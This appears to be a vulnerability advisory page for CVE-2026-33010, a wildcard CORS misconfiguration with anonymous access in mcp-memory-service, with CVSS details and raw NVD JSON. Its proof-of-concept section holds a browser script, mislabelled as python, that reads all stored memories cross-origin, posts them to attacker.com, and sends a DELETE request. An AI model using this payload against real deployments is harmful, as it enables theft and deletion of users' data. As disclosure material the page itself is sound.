Security Vulnerability Report
中文
CVE-2026-33010 CVSS 8.1 HIGH

CVE-2026-33010

Published: 2026-03-20 19:16:18
Last Modified: 2026-04-14 18:12:23
Source: [email protected]

Description

mcp-memory-service is an open-source memory backend for multi-agent systems. Prior to version 10.25.1, when the HTTP server is enabled (MCP_HTTP_ENABLED=true), the application configures FastAPI's CORSMiddleware with allow_origins=['*'], allow_credentials=True, allow_methods=["*"], and allow_headers=["*"]. The wildcard Access-Control-Allow-Origin: * header permits any website to read API responses cross-origin. When combined with anonymous access (MCP_ALLOW_ANONYMOUS_ACCESS=true) - the simplest way to get the HTTP dashboard working without OAuth - no credentials are needed, so any malicious website can silently read, modify, and delete all stored memories. This issue has been patched in version 10.25.1.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:doobidoo:mcp-memory-service:*:*:*:*:*:*:*:* - VULNERABLE
mcp-memory-service < 10.25.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-33010 --> <!-- This script demonstrates the impact of CORS misconfiguration --> <script> const targetUrl = 'http://vulnerable-target:port/api/memories'; // Attempt to read data fetch(targetUrl, { method: 'GET', credentials: 'include', // Sending cookies if any headers: { 'Content-Type': 'application/json' } }) .then(response => response.json()) .then(data => { console.log('Leaked Data:', data); // Send data to attacker's server fetch('https://attacker.com/log', { method: 'POST', body: JSON.stringify(data) }); }) .catch(error => console.error('Error:', error)); // Attempt to delete data fetch(targetUrl + '/1', { method: 'DELETE', credentials: 'include' }); </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33010", "sourceIdentifier": "[email protected]", "published": "2026-03-20T19:16:17.813", "lastModified": "2026-04-14T18:12:23.217", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "mcp-memory-service is an open-source memory backend for multi-agent systems. Prior to version 10.25.1, when the HTTP server is enabled (MCP_HTTP_ENABLED=true), the application configures FastAPI's CORSMiddleware with allow_origins=['*'], allow_credentials=True, allow_methods=[\"*\"], and allow_headers=[\"*\"]. The wildcard Access-Control-Allow-Origin: * header permits any website to read API responses cross-origin. When combined with anonymous access (MCP_ALLOW_ANONYMOUS_ACCESS=true) - the simplest way to get the HTTP dashboard working without OAuth - no credentials are needed, so any malicious website can silently read, modify, and delete all stored memories. This issue has been patched in version 10.25.1."}, {"lang": "es", "value": "mcp-memory-service es un backend de memoria de código abierto para sistemas multiagente. Antes de la versión 10.25.1, cuando el servidor HTTP está habilitado (MCP_HTTP_ENABLED=true), la aplicación configura el CORSMiddleware de FastAPI con allow_origins=['*'], allow_credentials=True, allow_methods=['*'] y allow_headers=['*']. El encabezado comodín Access-Control-Allow-Origin: * permite a cualquier sitio web leer respuestas de la API de origen cruzado. Cuando se combina con acceso anónimo (MCP_ALLOW_ANONYMOUS_ACCESS=true) - la forma más sencilla de hacer funcionar el panel de control HTTP sin OAuth - no se necesitan credenciales, por lo que cualquier sitio web malicioso puede leer, modificar y eliminar silenciosamente todas las memorias almacenadas. Este problema ha sido parcheado en la versión 10.25.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-942"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:doobidoo:mcp-memory-service:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.25.1", "matchCriteriaId": "25AB17B5-256A-4CAA-8493-CFF189D15973"}]}]}], "references": [{"url": "https://github.com/doobidoo/mcp-memory-service/security/advisories/GHSA-g9rg-8vq5-mpwm", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/doobidoo/mcp-memory-service/security/advisories/GHSA-g9rg-8vq5-mpwm", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.